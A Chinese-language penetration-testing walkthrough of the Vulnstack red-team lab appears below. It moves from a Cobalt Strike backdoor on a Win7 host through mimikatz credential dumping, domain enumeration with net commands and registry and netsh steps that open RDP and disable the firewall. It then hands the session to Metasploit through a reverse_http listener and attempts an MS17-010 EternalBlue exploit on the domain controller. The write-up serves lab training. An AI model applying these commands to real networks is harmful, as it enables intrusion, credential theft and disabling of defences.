1、靶机上线cs

我们已经拿到了win7的shell，执行whoami，发现win7是administrator权限，且在域中

执行ipconfig发现了win7存在内网网段192.168.52.0/24

kali开启cs服务端

客户端启动cs

先在cs中创建一个监听器

接着用cs生成后门，记得把杀软先关掉，不然后门生成就立马被杀了

使用蚁剑把后门上传到win7靶机的yxcms目录下

蚁剑上执行后门

cs上线成功

2、内网信息收集

使用mimikatz抓取目标的用户密码，直接拿下

这里抓取到密码之后，我们执行 net view 发现了域内另外俩台机器点击这里可以看到

（1）域内信息收集 

内网信息收集的主要目的就是查找域控以及域内的其他主机

 net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组（通常会有域用户）
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名（可能有多台）

 查看计算机名、全名、用户名、系统版本、工作站、域、登录域

1、先判断是否存在域，使用 ipconfig /all 查看 DNS 服务器，发现主 DNS 后缀不为空，存在域god.org

也可以执行命令net config workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息

2、上面发现 DNS 服务器名为 god.org，当前登录域为 GOD 再执行net view /domain查看有几个域(可能有多个)

3、查看域的组账户信息(工作组) net group /domain

4、既然只有一个域，那就利用 net group "domain controllers" /domain 命令查看域控制器主机名，直接确认域控主机的名称为 OWA

5、确认域控主机的名称为 OWA 再执行 net view 查看局域网内其他主机信息（主机名称、IP地址）

扫描出来：

域控主机：OWA  ip：192.168.52.138

域成员主机：ROOT-TVI862UBEH  IP:192.168.52.141

                      STU1   IP:192.168.52.143

接下来的目标就是横向渗透拿下域控

（2）rdp远程登录win7

Win7跳板机 默认是不开启3389的，同时还有防火墙

#注册表开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墙规则

netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

#关闭防火墙

netsh firewall set opmode disable #winsows server 2003 之前

netsh advfirewall set allprofiles state off #winsows server 2003 之后

以域用户GOD\Administrator登录

 

输入密码

成功登录

 3、内网渗透

（1）CS派生会话给MSF

1、msf开启监听

msfconsole # 启动MSF框架
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.236.128
set lport 1111
exploit 

2.CS开启外部监听

新建一个监听器，host为msf的ip，port与上面msf设置一致

 3、cs把控制的主机会话派生给msf

右键增加会话，选择刚刚新建的外部监听器

msf收到cs派生的shell 

4、msf简单利用

获得 MSF 的会话后即可使用 MSF 集成的诸多强大功能模块和脚本。简单演示下，如调用post/windows/gather/checkvm判断靶机是否属于虚拟机（检查是否进入了蜜罐）：

再如调用 post/windows/gather/enum_applications模块枚举列出安装在靶机上的应用程序：

5、添加路由

# 可以用模块自动添加路由
run post/multi/manage/autoroute
#添加一条路由
run autoroute -s 192.168.52.0/24
#查看路由添加情况
run autoroute -p

 

6、内网端口扫描

先执行background 命令将当前执行的 Meterpreter 会话切换到后台（后续也可执行sessions -i 重新返回会话），然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域控主机 192.168.52.138 开放的端口：

use auxiliary/scanner/portscan/tcp

set rhosts 192.168.52.138

set ports 80,135-139,445,3306,3389

run

 可以看到域控主机win2008  192.168.52.138开启了80，139，135，445端口

 

 （2）MSF进行ms17-010攻击

1、msf扫描模块探测是否存在ms17-010漏洞

对于开启了 445 端口的 Windows 服务器肯定是要进行一波永恒之蓝扫描尝试的，借助 MSF 自带的漏洞扫描模块进行扫描：

search ms17_010
use 3
set rhosts 192.168.52.138
run

可能存在ms17-010漏洞 

2、漏洞利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp #内网环境，需要正向shell连接
set rhosts 192.168.52.138
run

好像没有成功 

 

参考：Vulnstack 红日安全内网靶场[一] - 1vxyz - 博客园 (cnblogs.com)